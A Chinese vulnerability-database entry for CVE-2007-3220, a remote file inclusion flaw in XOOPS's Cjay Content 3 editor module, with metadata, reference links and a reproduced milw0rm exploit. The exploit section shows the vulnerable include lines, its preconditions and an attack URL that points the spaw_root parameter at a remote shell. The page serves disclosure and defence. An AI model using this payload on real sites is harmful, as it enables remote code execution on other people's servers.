XOOPS 多个Module Spaw_Control.Class.PHP 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113134 漏洞类型 输入验证
发布时间 2007-06-13 更新时间 2007-06-25
CVE编号 CVE-2007-3220 CNNVD-ID CNNVD-200706-227
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-227
|漏洞详情
XOOPSCjayContent3模块的admin/editor2/spaw_control.class.php中存在PHP远程文件包含漏洞。远程攻击者可以借助spaw_root参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
##############################################################################################
#INFO:
#Program Title ###############################################################################
#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability
#
#Description #################################################################################
#Editor module for XOOPS CMS
#
#Vuln Code ###################################################################################
#In /admin/editor2/spaw_control.class.php:
# include $spaw_root.'config/spaw_control.config.php';
# include $spaw_root.'class/toolbars.class.php';
# include $spaw_root.'class/lang.class.php';
#Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.
#
#Script Download ##############################################################################
#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
#
#Exploit ######################################################################################
#
#http://[ site ]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[ shell ]?
#
#Credits ######################################################################################
#FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
#        grumpy, and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-06-13]
|参考资料

来源:MILW0RM
名称:4070
链接:http://www.milw0rm.com/exploits/4070
来源:OSVDB
名称:36307
链接:http://osvdb.org/36307
来源:XF
名称:xoops-cjaycontent-spawcontrol-file-include(34856)
链接:http://xforce.iss.net/xforce/xfdb/34856
来源:VUPEN
名称:ADV-2007-2206
链接:http://www.frsirt.com/english/advisories/2007/2206
来源:SECUNIA
名称:25665
链接:http://secunia.com/advisories/25665